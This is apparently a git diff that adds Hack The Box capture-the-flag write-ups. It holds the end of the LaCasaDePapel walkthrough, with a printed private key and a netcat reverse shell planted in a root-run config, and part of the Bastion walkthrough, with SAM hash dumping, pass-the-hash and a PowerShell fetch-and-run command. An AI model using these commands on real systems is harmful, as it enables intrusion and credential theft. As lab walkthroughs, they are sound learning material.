+ t8dQedPW8J71LR0igh8ckkuP13ZWPUUdTJJDc4UZycDzNruCj/8kPYn4Lo4s8E1XJ3y/F8
+ GQn2NvjjhkOgS+fMnQwfxPl3yDg4g/QgxOQ5b3yZwPVUM75IjperwQYXjzfY1XO5WtyGc7
+ 5iUJMuSvXWukWAKJtBAAABAA+0Nxztrd02xlT+o9FRgUJ2CCed11eqAX2Lo2tpJB8G7e88
+ 9OCz3YqRDAQSm4/1okhKPUj3B/bcZqOyRFbABZTJYOg0/m0Ag6Fb26S3TBMMrAgrSnxksZ
+ 36KlW1WpuwrKq+4jSFJV5cPjpk9jVQmhvdgxHlSjIEpOkByOH4aKK7wuaIA5jqPKrq74cD
+ mukNhpV4xjan1Rj7zPFLnoce0QMWdX4CShUa+BNInls8/v7MflLgxQ53I21cHXTdNf5zrc
+ 48jlAJQuRiTSgIYSu+G1IIoLibVA/GPWOOJ2jmV0cpNzfbmGM/A2AEGvSKtuP9DwA1NHfn
+ DDUIZds61tF9CxUAAAEBANVkFLByFDv9qnHymc/tr6dtqyyMY6D7YeU3ZWL+dNPSlSW/bN
+ YjlA9S4aB2yuN+tAMeU0E6jKgh1+ROlNwXu48uN/QL50gZpiLcSlqZnhFQ/2El2Uvj2Y/S
+ PnklDVQnQ/5yZBQR0bBiy/EJIOfJQo0KRbR/pq51eUhzBSEBMz6nBIY8zPdOVfhngZUpMe
+ 4S7N1RPDWS2OvGwwWkwmmiJe45cGD7SKLj0Jv+p/DZ+k9ZiI5tEGY87DKAh0wrV04u4I/l
+ xGl6TCoXDr7hi1dAdVWW84cj8mFW7q9UN0y15Vn82HPIq5ZaSKfM6qPKfYeBBaN8hUIogf
+ +FlwHjzSWOPb0AAAEBAMNU3uGeUUMVn1dUOMeemr+LJVHHjtqbL3oq97+fd1ZQ6vchTyKX
+ 6cbCC7gB13qJ6oWO1GhB9e4SAd3DYiNv/LO9z1886DyqNLVHKYXn0SNSLTPb7n9NjwJNz1
+ GuPqW43pGwlBhMPZhJPA+4wmiO9GV+GXlaFrz16Or/qCexGyovMIhKtV0Ks3XzHhhjG41e
+ gKd/wGl3vV74pTWIyS2Nrtilb7ii8jd2MezuSTf7SmjiE0GPY8xt0ZqVq+/Fj/vfM+vbN1
+ ram9k+oABmLisVVgkKvfbzWRmGMDfG2X0jOrIw52TZn9MwTcr+oMyi1RTG7oabPl6cNM0x
+ X3a0iF5JE3kAAAAYYmVybGluQGxhY2FzYWRlcGFwZWwuaHRiAQID
+ -----END OPENSSH PRIVATE KEY-----
+
+
+Looks like we found a private key ! let's try logging in as one of the users :
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → curl -sk https://lacasadepapel.htb/file/Li4vLnNzaC9pZF9yc2E\= > privatekey
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → chmod 600 privatekey
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → ssh -i privatekey professor@10.10.10.131
+ The authenticity of host '10.10.10.131 (10.10.10.131)' can't be established.
+ ECDSA key fingerprint is SHA256:rA99W+GVzo0hlABp1vMj9ChhjLwybPhHTpb65AWm7xI.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.131' (ECDSA) to the list of known hosts.
+
+ _ ____ ____ ____ _
+ | | __ _ / ___|__ _ ___ __ _ | _ \ ___ | _ \ __ _ _ __ ___| |
+ | | / _` | | | / _` / __|/ _` | | | | |/ _ \ | |_) / _` | '_ \ / _ \ |
+ | |__| (_| | | |__| (_| \__ \ (_| | | |_| | __/ | __/ (_| | |_) | __/ |
+ |_____\__,_| \____\__,_|___/\__,_| |____/ \___| |_| \__,_| .__/ \___|_|
+ |_|
+
+ lacasadepapel [~]$ whoami
+ professor
+
+ lacasadepapel [~]$ cd /home/professor && ls
+ memcached.ini memcached.js node_modules
+
+ lacasadepapel [~]$
+
+
+and we are logged in ! however we still need to escalate privileges to be able to print out the flags. printing out the file memcached.ini we see some kind of a command being run and the file itself is owned by root. changing it we should be able to privesc.
+
+_Terminal 1:_
+
+
+ lacasadepapel [~]$ which nc
+ /usr/bin/nc
+ lacasadepapel [~]$ vi memcached.ini
+
+
+
+ [program:memcached]
+ command = sudo -u root /usr/bin/nc 10.10.14.7 1234 -e /bin/bash
+
+
+_Terminal 2:_
+
+
+ λ nihilist [ 10.10.14.7/23 ] [~/_HTB/CasaDePapel]
+ → nc -lvnp 1234
+ listening on [any] 1234 ...
+ connect to [10.10.14.7] from (UNKNOWN) [10.10.10.131] 43309
+ python -c 'import pty;pty.spawn("/bin/bash");'
+ bash-4.4# whoami
+ whoami
+ root
+ cd /home
+ bash-4.4# ls
+ ls
+ berlin dali nairobi oslo professor
+ bash-4.4# cd berlin
+ cd berlin
+ bash-4.4# ls
+ ls
+ downloads node_modules server.js user.txt
+ bash-4.4# cat user.txt
+ cat user.txt
+ 4dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+and we are logged in as root ! all that's left to do is printing our flags.
+
+## **Part 3 : Getting Root Access**
+
+
+ bash-4.4# cat /root/root.txt
+ cat /root/root.txt
+ 58XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/31.md b/Easy/31.md
new file mode 100644
index 0000000..a2a89b0
--- /dev/null
+++ b/Easy/31.md
@@ -0,0 +1,758 @@
+# Bastion Writeup
+
+
+
+## Introduction :
+
+Bastion is an easy Windows Box that was released back in April 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 85.171.153.138 ] [ ~/_HTB/ ]
+ → nmap -F 10.10.10.134
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 18:20 CET
+ Nmap scan report for 10.10.10.134
+ Host is up (0.044s latency).
+ Not shown: 96 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 135/tcp open msrpc
+ 139/tcp open netbios-ssn
+ 445/tcp open microsoft-ds
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.45 seconds
+
+ λ nihilist [ 85.171.153.138 ] [ ~/_HTB/ ]
+ → nmap -sCV -p22,135,139,445 10.10.10.134
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 18:21 CET
+ Nmap scan report for 10.10.10.134
+ Host is up (0.059s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
+ | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
+ |_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
+ Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: -19m28s, deviation: 34m37s, median: 30s
+ | smb-os-discovery:
+ | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
+ | Computer name: Bastion
+ | NetBIOS computer name: BASTION\x00
+ | Workgroup: WORKGROUP\x00
+ |_ System time: 2019-12-09T18:21:46+01:00
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2019-12-09T17:21:48
+ |_ start_date: 2019-12-09T16:05:13
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 18.74 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port the smbservice running on port 135, 139 and 445, let's see if we can enumerate it a little further :
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/] → smbclient -L //10.10.10.134/ -U ""
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\'s password:
+
+ Sharename Type Comment
+ --------- ---- -------
+ ADMIN$ Disk Remote Admin
+ Backups Disk
+ C$ Disk Default share
+ IPC$ IPC Remote IPC
+ Reconnecting with SMB1 for workgroup listing.
+ do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
+ Unable to connect with SMB1 -- no workgroup available
+
+
+
+We seem to have a few services we can work with : let's check out Backups first.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Bastion ]
+ → smbclient //10.10.10.134/Backups
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\nihilist's password:
+ Try "help" to get a list of possible commands.
+ smb: \> ls
+ . D 0 Tue Apr 16 12:02:11 2019
+ .. D 0 Tue Apr 16 12:02:11 2019
+ note.txt AR 116 Tue Apr 16 12:10:09 2019
+ SDT65CB.tmp A 0 Fri Feb 22 13:43:08 2019
+ WindowsImageBackup D 0 Fri Feb 22 13:44:02 2019
+
+ 7735807 blocks of size 4096. 2747575 blocks available
+ smb: \> get note.txt
+ getting file \note.txt of size 116 as note.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
+
+
+Now that we saved the note.txt locally we print out it's contents
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bastion] → cat note.txt
+
+ Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
+
+
+Let's follow their advice and mount the share
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → mount -t cifs //10.10.10.134/Backups mount
+ Password for root@//10.10.10.134/Backups:
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → ls && cd mount
+ mount note.txt
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → ls
+ note.txt SDT65CB.tmp WindowsImageBackup
+
+
+
+
+We can also enumerate the smb share using smbmap as demonstrated below :
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → smbmap -u nihilist -H 10.10.10.134
+ [+] Finding open SMB ports....
+ [+] Guest SMB session established on 10.10.10.134...
+ [+] IP: 10.10.10.134:445 Name: 10.10.10.134
+ Disk Permissions Comment
+ ---- ----------- -------
+ ADMIN$ NO ACCESS Remote Admin
+ Backups READ, WRITE
+ [!] Unable to remove test directory at \\10.10.10.134\BackupsvXVtBOoZjY, please remove manually
+ C$ NO ACCESS Default share
+ .
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 InitShutdown
+ fr--r--r-- 4 Sun Dec 31 23:58:45 1600 lsass
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 ntsvcs
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 scerpc
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-2e4-0
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 epmapper
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-1cc-0
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 LSM_API_service
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 eventlog
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-378-0
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 atsvc
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-344-0
+ fr--r--r-- 4 Sun Dec 31 23:58:45 1600 wkssvc
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 spoolss
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-5e0-0
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 trkwks
+ fr--r--r-- 3 Sun Dec 31 23:58:45 1600 W32TIME_ALT
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 openssh-ssh-agent
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 vgauth-service
+ fr--r--r-- 4 Sun Dec 31 23:58:45 1600 srvsvc
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-5a4-0
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-250-0
+ fr--r--r-- 1 Sun Dec 31 23:58:45 1600 Winsock2\CatalogChangeListener-248-0
+ IPC$ READ ONLY Remote IPC
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → ls
+ note.txt SDT65CB.tmp vXVtBOoZjY WindowsImageBackup
+
+
+The interesting thing to see here is that using smbmap it makes the directory named "vXVtBOoZjY" appear. Earlier the note.txt said that this was a massive share for their office's slow VPN, let's check the size using the **du** command.
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → ls
+ note.txt SDT65CB.tmp vXVtBOoZjY WindowsImageBackup
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → du -hs WindowsImageBackup
+ 5.1G WindowsImageBackup
+
+
+5.1 Gigs is quite alot indeed, now navigating into WindowsImageBackup we see the folder named 'L4mpje-PC'
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/mount]
+ → cd WindowsImageBackup
+
+ λ root [ 10.10.14.15/23 ] [Bastion/mount/WindowsImageBackup]
+ → cd L4mpje-PC
+
+ λ root [ 10.10.14.15/23 ] [mount/WindowsImageBackup/L4mpje-PC]
+ → ls
+ 'Backup 2019-02-22 124351' Catalog MediaId SPPMetadataCache
+
+
+The backup folder seems interesting, let's see what we can get in there.
+
+
+ λ root [ 10.10.14.15/23 ] [mount/WindowsImageBackup/L4mpje-PC]
+ → cd Backup\ 2019-02-22\ 124351
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → du -hs *
+ 37M 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
+ 5.1G 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
+ 4.0K BackupSpecs.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
+ 12K cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
+ 8.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
+ 4.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
+ 8.0K cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
+ 2.3M cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
+
+
+
+Right here we see two interesting .vhd harddrives one weighing 37 Megs and the other one weighing 5.1Gigs From there, we will need to mount the virtual harddrives (VHD), to do so we will use the guestmount command
+
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → guestmount
+ zsh: command not found: guestmount
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → apt install libguestfs-tools && guestmount --help
+
+
+Once it's done installing, run the following command :
+
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → mkdir /home/nihilist/_HTB/Bastion/vhd
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /home/nihilist/_HTB/Bastion/vhd
+
+
+once it's done mounting, let's browse into the vhd directory we just created, and view the contents of the mounted virtual harddrive
+
+
+ λ root [ 10.10.14.15/23 ] [WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351]
+ → cd /home/nihilist/_HTB/Bastion
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → cd vhd
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/vhd]
+ → ls
+ '$Recycle.Bin' config.sys pagefile.sys ProgramData Recovery Users
+ autoexec.bat 'Documents and Settings' PerfLogs 'Program Files' 'System Volume Information' Windows
+
+ λ root [ 10.10.14.15/23 ] [vhd/Users/L4mpje]
+ → find Desktop Documents Downloads -ls
+ 25 0 drwxrwxrwx 1 root root 0 Feb 22 2019 Desktop
+ 49 1 -rwxrwxrwx 1 root root 282 Feb 22 2019 Desktop/desktop.ini
+ 26 4 drwxrwxrwx 1 root root 4096 Feb 22 2019 Documents
+ 50 1 -rwxrwxrwx 1 root root 402 Feb 22 2019 Documents/desktop.ini
+ 51 0 lrwxrwxrwx 2 root root 27 Feb 22 2019 Documents/My\ Music -> /sysroot/Users/L4mpje/Music
+ 52 0 lrwxrwxrwx 2 root root 30 Feb 22 2019 Documents/My\ Pictures -> /sysroot/Users/L4mpje/Pictures
+ 53 0 lrwxrwxrwx 2 root root 28 Feb 22 2019 Documents/My\ Videos -> /sysroot/Users/L4mpje/Videos
+ 27 0 drwxrwxrwx 1 root root 0 Feb 22 2019 Downloads
+ 54 1 -rwxrwxrwx 1 root root 282 Feb 22 2019 Downloads/desktop.ini
+
+
+
+nothing too interesting there, let's check out the Windows/System32/config/ folder.
+
+
+ λ root [ 10.10.14.15/23 ] [vhd/Users/L4mpje]
+ → cd ../..
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/vhd]
+ → cd Windows/System32/config
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → ls
+ BCD-Template SAM
+ BCD-Template.LOG SAM.LOG
+ COMPONENTS SAM.LOG1
+ COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.0.regtrans-ms SAM.LOG2
+ COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.1.regtrans-ms SECURITY
+ COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.2.regtrans-ms SECURITY.LOG
+ COMPONENTS{6cced2ec-6e01-11de-8bed-001e0bcd1824}.TxR.blf SECURITY.LOG1
+ COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TM.blf SECURITY.LOG2
+ COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms SOFTWARE
+ COMPONENTS{6cced2ed-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms SOFTWARE.LOG
+ COMPONENTS.LOG SOFTWARE.LOG1
+ COMPONENTS.LOG1 SOFTWARE.LOG2
+ COMPONENTS.LOG2 SYSTEM
+ DEFAULT SYSTEM.LOG
+ DEFAULT.LOG SYSTEM.LOG1
+ DEFAULT.LOG1 SYSTEM.LOG2
+ DEFAULT.LOG2 systemprofile
+ Journal TxR
+ RegBack
+
+
+let's copy the SAM and SYSTEM files locally.
+
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → cp SAM SYSTEM /home/nihilist/_HTB/Bastion
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → cd ../../../..
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → ls
+ mount note.txt SAM SYSTEM vhd
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → file SAM SYSTEM
+ SAM: MS Windows registry file, NT/2000 or above
+ SYSTEM: MS Windows registry file, NT/2000 or above
+
+
+
+Here we see that both these files are windows registry files, they may contain some interesting things. let's move them in another folder.
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → mkdir backup && mv SAM backup/ && mv SYSTEM backup/
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → cd backup
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/backup]
+ → ls
+ SAM SYSTEM
+
+
+from there we'll use the impacket-secretsdump command :
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/backup]
+ → impacket-secretsdump -sam SAM -system SYSTEM local
+ Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
+
+ [*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
+ [*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
+ Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+ Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+ L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
+ [*] Cleaning up...
+
+
+And we have a few hashes, the administrator hash is blank (31d6 means nothing) so it probably means that the administrator account is disabled. Let's focus on the L4mpje user instead, we'll use the smbmap command once again, setting the -u (user) and -p (hash) -H (host) flags
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/backup]
+ → smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134
+ [+] Finding open SMB ports....
+ [+] Hash detected, using pass-the-hash to authenticate
+ [+] User session established on 10.10.10.134...
+ [+] IP: 10.10.10.134:445 Name: 10.10.10.134
+ Disk Permissions Comment
+ ---- ----------- -------
+ ADMIN$ NO ACCESS Remote Admin
+ Backups READ, WRITE
+ C$ NO ACCESS Default share
+
+
+Looking at the results, we don't seem to have gained preety much anything, instead let's check out the ssh port that our nmap scan discovered earlier. In order to do so, we didn't find our password yet, we'll use the hash on https://hashes.org/search.php to see if it can guess it for us.
+
+ 
+
+looking at the results, we seem to have credentials ! L4mpje:bureaulampje , now let's try to login as the user L4mpje through ssh.
+
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/backup]
+ → ssh L4mpje@10.10.10.134
+ The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
+ ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
+ L4mpje@10.10.10.134's password:
+
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ l4mpje@BASTION C:\Users\L4mpje>
+
+
+And we have user access to the box. let's print out the user flag.
+
+
+ l4mpje@BASTION C:\Users\L4mpje>cd Desktop
+
+ l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 0CB3-C487
+
+ Directory of C:\Users\L4mpje\Desktop
+
+ 22-02-2019 15:27 <****DIR> .
+ 22-02-2019 15:27 <****DIR> ..
+ 23-02-2019 09:07 32 user.txt
+ 1 File(s) 32 bytes
+ 2 Dir(s) 11.298.652.160 bytes free
+
+ l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
+ 9bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it ! We have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now to escalate privileges on the box we need to do a few things :
+
+
+ l4mpje@BASTION C:\Users\L4mpje>net localgroup administrators
+ Alias name administrators
+ Comment Administrators have complete and unrestricted access to the computer/domain
+
+ Members
+
+ -------------------------------------------------------------------------------
+ Administrator
+ The command completed successfully.
+
+
+Looking at the results of the **net localgroup administrators** command, we see that the user "Administrator" is there, even though we thought that he was disabled before. Let's run the net user command on our own user l4mpje to see which groups we are part of.
+
+
+ l4mpje@BASTION C:\Users\L4mpje>net user l4mpje
+ User name L4mpje
+ Full Name L4mpje
+ Comment
+ User's comment
+ Country/region code 000 (System Default)
+ Account active Yes
+ Account expires Never
+
+ Password last set 22-2-2019 13:42:58
+ Password expires Never
+ Password changeable 22-2-2019 13:42:58
+ Password required Yes
+ User may change password No
+
+ Workstations allowed All
+ Logon script
+ User profile
+ Home directory
+ Last logon 12-2-2020 20:31:20
+
+ Logon hours allowed All
+
+ Local Group Memberships *Users
+ Global Group memberships *None
+ The command completed successfully.
+
+
+so here it says that our local group membership is with ***Users**. Running the same command on the Administrator user we see that
+
+
+ l4mpje@BASTION C:\Users\L4mpje>net user Administrator
+ User name Administrator
+ Full Name
+ Comment Built-in account for administering the computer/domain
+ User's comment
+ Country/region code 000 (System Default)
+ Account active Yes
+ Account expires Never
+
+ Password last set 16-4-2019 11:00:56
+ Password expires Never
+ Password changeable 16-4-2019 11:00:56
+ Password required Yes
+ User may change password Yes
+
+ Workstations allowed All
+ Logon script
+ User profile
+ Home directory
+ Last logon 27-8-2019 10:18:29
+
+ Logon hours allowed All
+
+ Local Group Memberships *Administrators
+ Global Group memberships *None
+ The command completed successfully.
+
+
+here we see that the administrator user has his password last set on **16-4-2019 11:00:56**
+
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → cd vhd
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/vhd]
+ → ls
+ '$Recycle.Bin' config.sys pagefile.sys ProgramData Recovery Users
+ autoexec.bat 'Documents and Settings' PerfLogs 'Program Files' 'System Volume Information' Windows
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/vhd]
+ → cd Windows/System32/config
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → ls -lash | grep SAM
+ 256K -rwxrwxrwx 1 root root 256K Feb 22 2019 SAM
+ 4.0K -rwxrwxrwx 1 root root 1.0K Apr 12 2011 SAM.LOG
+ 24K -rwxrwxrwx 2 root root 21K Feb 22 2019 SAM.LOG1
+ 0 -rwxrwxrwx 2 root root 0 Jul 14 2009 SAM.LOG2
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → ls -lash | grep SYSTEM
+ 9.3M -rwxrwxrwx 1 root root 9.3M Feb 22 2019 SYSTEM
+ 4.0K -rwxrwxrwx 1 root root 1.0K Apr 12 2011 SYSTEM.LOG
+ 3.5M -rwxrwxrwx 2 root root 256K Feb 22 2019 SYSTEM.LOG1
+ 0 -rwxrwxrwx 2 root root 0 Jul 14 2009 SYSTEM.LOG2
+
+
+
+
+From there we see that the SAM and SYSTEM registry files were last modified Febuary 22nd, so that's why we weren't able to see the administrator account before. Now in order to privesc, we will use a tool called JAWS which is a windows enumerating script
+
+
+ λ root [ 10.10.14.15/23 ] [Windows/System32/config]
+ → cd ../../..
+
+ λ root [ 10.10.14.15/23 ] [_HTB/Bastion/vhd]
+ → cd ..
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → curl -sk https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1 > jaws-enum.ps1
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → ifconfig | grep inet
+ inet 192.168.0.19 netmask 255.255.255.0 broadcast 192.168.0.255
+ inet6 fe80::82fa:5bff:fe5b:4334 prefixlen 64 scopeid 0x20
+ inet 127.0.0.1 netmask 255.0.0.0
+ inet6 ::1 prefixlen 128 scopeid 0x10
+ inet 10.10.14.15 netmask 255.255.254.0 destination 10.10.14.15
+ inet6 dead:beef:2::100d prefixlen 64 scopeid 0x0
+ inet6 fe80::f96c:5ab:2911:51b prefixlen 64 scopeid 0x20
+
+ λ root [ 10.10.14.15/23 ] [nihilist/_HTB/Bastion]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+We will download the script (jaws-enum.ps1) at our ip (10.10.14.15) at the correct port (8080) onto the box.
+
+
+ l4mpje@BASTION C:\Users\L4mpje>IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15:8080/jaws-enum.ps1')
+ 'IEX' is not recognized as an internal or external command,
+ operable program or batch file.
+
+
+let's not forget that we'll use powershell to run that command :)
+
+
+ l4mpje@BASTION C:\Users\L4mpje>powershell
+ Windows PowerShell
+ Copyright (C) 2016 Microsoft Corporation. All rights reserved.
+
+ PS C:\Users\L4mpje> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15:8080/jaws-enum.ps1')
+
+ Running J.A.W.S. Enumeration
+
+
+while that runs let's run another ssh session to see what we can find
+
+
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ l4mpje@BASTION C:\Users\L4mpje>cd ../..
+
+ l4mpje@BASTION C:\>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 0CB3-C487
+
+ Directory of C:\
+
+ 12-02-2020 20:22 <****DIR> Backups
+ 12-09-2016 12:35 <****DIR> Logs
